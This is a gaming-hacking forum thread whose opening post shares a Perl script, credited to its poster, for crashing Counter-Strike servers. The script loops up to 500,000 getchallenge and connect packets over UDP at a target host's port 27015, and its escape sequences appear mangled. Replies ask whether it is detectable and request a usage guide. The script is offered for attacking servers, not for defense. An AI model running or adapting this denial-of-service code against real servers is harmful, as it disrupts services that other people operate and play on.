Please Log-in or Register to get full access to the forums.

Lost Password?

Post Reply 
 
Thread Rating:
  • 0 Votes - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Exploit that killz a CS server
12-29-2009, 18:10
Post: #1
Exploit that killz a CS server
print "the host..eg: 465.124.5.64 : ";
$HOST = <STDIN>;
chop ($HOST);
$i=0;
if (fork())
{      econnect($host); }
else
{

econnect($host); };
exit;

sub econnect($)
{
while($i<500000){
$i++;
        my $host=$_[0];
        my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
        die "Could not create socket: $!n" unless $sock;
        $cmd="xffxffxffxff";
        syswrite $sock, $cmd."getchallenge";

        sysread $sock,$b,65535;  print $b,"n";
        @c=split(/ /,$b);

        $c2=$c[1];

        $q=$cmd."connect 47 $c2 "\prot\4\unique\0\raw\valve\cdkey\f0ef8a36258af1bb64ed866538c9db76""\"";
print '>',$q,"n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"n";
sleep 3;
close $sock;
}
}


CREDITS: ME
Quote
12-30-2009, 02:00
Post: #2
Re: Exploit that killz a CS server
yes goob job thank you  :Smile
Quote
01-09-2010, 21:36
Post: #3
Re: Exploit that killz a CS server
is it detectable?
Quote
01-10-2010, 18:06
Post: #4
Re: Exploit that killz a CS server
Its good, but if you will make a tutorial how to use it, it will be much better Tongue
Quote
08-16-2010, 12:11
Post: #5
Re: Exploit that killz a CS server
ok ok But  anyone know how to use it??
Quote
09-07-2010, 23:37
Post: #6
Re: Exploit that killz a CS server
i get dc from cs..
Quote
10-27-2010, 08:39
Post: #7
Re: Exploit that killz a CS server
i get to disconect from CS Sad
Quote
02-13-2011, 23:47
Post: #8
Re: Exploit that killz a CS server
does it works atm ?
Quote
05-25-2011, 21:31
Post: #9
Re: Exploit that killz a CS server
Yes a guide would be nice , ty Smile
Quote
Post Reply 


Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [exploit]35hp(+pics) Pod3r 10 762 06-06-2011 20:03
Last Post: Lucre
  [CS] How To DoS a Server Pod3r 14 1,660 10-27-2010 08:35
Last Post: niksmareks
  Exploit (Crash .....) Pod3r 9 812 09-07-2010 23:29
Last Post: roberto576

Forum Jump:


User(s) browsing this thread: 1 Guest(s)